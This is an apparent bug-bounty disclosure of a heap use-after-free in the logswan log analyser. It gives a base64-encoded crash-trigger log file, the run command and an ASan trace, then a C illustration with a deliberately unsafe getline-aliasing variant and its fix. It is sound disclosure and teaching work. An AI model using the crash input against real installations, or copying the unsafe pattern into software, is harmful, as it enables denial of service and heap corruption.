Use After Free in fcambus/logswan

Valid

Reported on Nov 29th 2021


Description

Good morning, I hope you're doing well today. Whilst testing logswan built with Clang 12 + ASan on Ubuntu 20.04.3 LTS from commit bcfd41, we discovered a heap-use-after-free situation during a strcmp operation on line 259 of logswan/src/logswan.c.

Proof of Concept

First...

# -d decodes the blob; the decoded text is the crafted log file (three lines,
# the middle one a run of more than 120 '0' characters)
echo "MC4wLjAuMCAwIDBbMF0wIiAKMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAKMC4wLjAuMCAwIDBbMF0wIjA=" | base64 -d > /tmp/test.log

Then...

# run the ASan build of logswan against the decoded file
./logswan /tmp/test.log

Stack Trace:

==8152==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000000051 at pc 0x00000026f5d2 bp 0x7ffcf50d1170 sp 0x7ffcf50d0918
READ of size 1 at 0x60c000000051 thread T0
    #0 0x26f5d1 in strcmp (/root/logswan/build/logswan+0x26f5d1)
    #1 0x30d473 in main /root/logswan/src/logswan.c:259:11
    #2 0x7fa42491f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #3 0x25c7ad in _start (/root/logswan/build/logswan+0x25c7ad)

0x60c000000051 is located 17 bytes inside of 120-byte region [0x60c000000040,0x60c0000000b8)
freed by thread T0 here:
    #0 0x2d7d29 in realloc (/root/logswan/build/logswan+0x2d7d29)
    #1 0x7fa42497e71d in getdelim /build/glibc-eX1tMB/glibc-2.31/libio/iogetdelim.c:102:27
    #2 0x7fa424b1ba5f  (/lib/x86_64-linux-gnu/libpthread.so.0+0x3a5f)

previously allocated by thread T0 here:
    #0 0x2d7a0d in malloc (/root/logswan/build/logswan+0x2d7a0d)
    #1 0x7fa42497e6c3 in getdelim /build/glibc-eX1tMB/glibc-2.31/libio/iogetdelim.c:62:27
    #2 0x7fa424b1ba5f  (/lib/x86_64-linux-gnu/libpthread.so.0+0x3a5f)

SUMMARY: AddressSanitizer: heap-use-after-free (/root/logswan/build/logswan+0x26f5d1) in strcmp
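The trace above tells the whole story: the region was allocated by malloc inside getdelim (that is getline's line buffer; 120 bytes is what glibc's getdelim allocates on first use), it was freed by realloc inside a later getdelim call (the buffer had to grow, and the decoded PoC's second line is longer than 120 bytes), and the read happened in strcmp from main. In other words, a pointer into the line buffer outlived the getline call that owned it. The following is an added illustration of that bug class, written for this page and not taken from logswan; the Common Log Format input, the "client host" field, and the function names are assumptions. The unsafe variant reproduces the same ASan report under -fsanitize=address, and the fixed variant shows the standard remedy, copying the field into memory the caller owns:

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical vulnerable pattern (not logswan's code): the host field of the
 * previous line is remembered as a pointer INTO getline()'s buffer.  The next
 * getline() overwrites that buffer, and if the new line does not fit,
 * getdelim() realloc()s it and frees the old block, so `prev_host` dangles and
 * the compare below is the report's "heap-use-after-free ... freed by realloc
 * in getdelim".  Even without a realloc the logic is wrong, because
 * `prev_host` then points at the NEW line.  Only run this under ASan. */
size_t count_same_host_runs_unsafe(FILE *fp)
{
    char *line = NULL, *prev_host = NULL;
    size_t cap = 0, prev_len = 0, runs = 0;
    while (getline(&line, &cap, fp) != -1) {
        size_t len = strcspn(line, " \n");          /* first field = client host */
        if (prev_host && prev_len == len && strncmp(prev_host, line, len) == 0)
            runs++;                                  /* UAF read once buffer moved */
        prev_host = line;                            /* BUG: alias, not a copy */
        prev_len = len;
    }
    free(line);
    return runs;
}

/* Fixed pattern: copy the field into storage we own (strndup) before the next
 * getline() call, so no pointer into the line buffer survives the loop body. */
size_t count_same_host_runs(FILE *fp)
{
    char *line = NULL, *prev_host = NULL;
    size_t cap = 0, runs = 0;
    while (getline(&line, &cap, fp) != -1) {
        size_t len = strcspn(line, " \n");
        if (prev_host && strlen(prev_host) == len && memcmp(prev_host, line, len) == 0)
            runs++;
        free(prev_host);
        prev_host = strndup(line, len);              /* owned copy of the host */
        if (!prev_host) break;                       /* allocation failure: stop */
    }
    free(prev_host);
    free(line);
    return runs;
}

/* Convenience wrapper over an in-memory string (fmemopen is POSIX). */
size_t count_same_host_runs_str(const char *text)
{
    size_t n = strlen(text);
    if (n == 0) return 0;
    FILE *fp = fmemopen((void *)text, n, "r");
    if (!fp) return 0;
    size_t runs = count_same_host_runs(fp);
    fclose(fp);
    return runs;
}

/* Constructed sample (not from the report): line 2 is padded well past the
 * 120 bytes glibc's getdelim() allocates on first use, so the buffer is
 * realloc()ed between line 1 and line 2, as the PoC's long second line does.
 * Lines 2-4 share a host, so the correct answer is 2 runs. */
char *build_sample(void)
{
    enum { PAD = 600, SIZE = 1024 + PAD };
    char pad[PAD + 1];
    memset(pad, 'a', PAD);
    pad[PAD] = '\0';
    char *buf = malloc(SIZE);
    if (!buf) return NULL;
    int n = snprintf(buf, SIZE,
        "10.0.0.1 - - [01/Jan/2021:00:00:00 +0000] \"GET / HTTP/1.1\" 200 1\n"
        "10.0.0.2 - - [01/Jan/2021:00:00:01 +0000] \"GET /%s HTTP/1.1\" 200 1\n"
        "10.0.0.2 - - [01/Jan/2021:00:00:02 +0000] \"GET /x HTTP/1.1\" 200 1\n"
        "10.0.0.2 - - [01/Jan/2021:00:00:03 +0000] \"GET /y HTTP/1.1\" 200 1\n"
        "10.0.0.3 - - [01/Jan/2021:00:00:04 +0000] \"GET /z HTTP/1.1\" 200 1\n",
        pad);
    if (n < 0 || n >= SIZE) { free(buf); return NULL; }
    return buf;
}

int main(void)
{
    char *sample = build_sample();
    if (!sample) return 1;
    printf("fixed: %zu same-host runs\n", count_same_host_runs_str(sample));
#ifdef TRIGGER_UAF
    /* cc -g -fsanitize=address -DTRIGGER_UAF uaf.c && ./a.out */
    FILE *fp = fmemopen(sample, strlen(sample), "r");
    if (fp) {
        printf("unsafe: %zu\n", count_same_host_runs_unsafe(fp));
        fclose(fp);
    }
#endif
    free(sample);
    return 0;
}
```

Build the fixed path with plain `cc uaf.c`; build with `-fsanitize=address -DTRIGGER_UAF` to see the unsafe path produce an ASan report with the same shape as the one above (read in the string compare, freed by realloc in getdelim, allocated by malloc in getdelim). The general rule the fix applies: anything parsed out of a getline() buffer that must survive the next read needs its own allocation or a fixed-size copy, never a saved pointer.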

Impact

This vulnerability is capable of crashing the software, corrupting the heap, and causing other unspecified issues that result from using memory after the software has freed it.

We are processing your report and will contact the fcambus/logswan team within 24 hours. 2 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the fcambus/logswan team and are waiting to hear back 2 months ago
Jamie Slome validated this vulnerability a month ago
Geeknik Labs has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on c3fc63 a month ago
The fix bounty has been dropped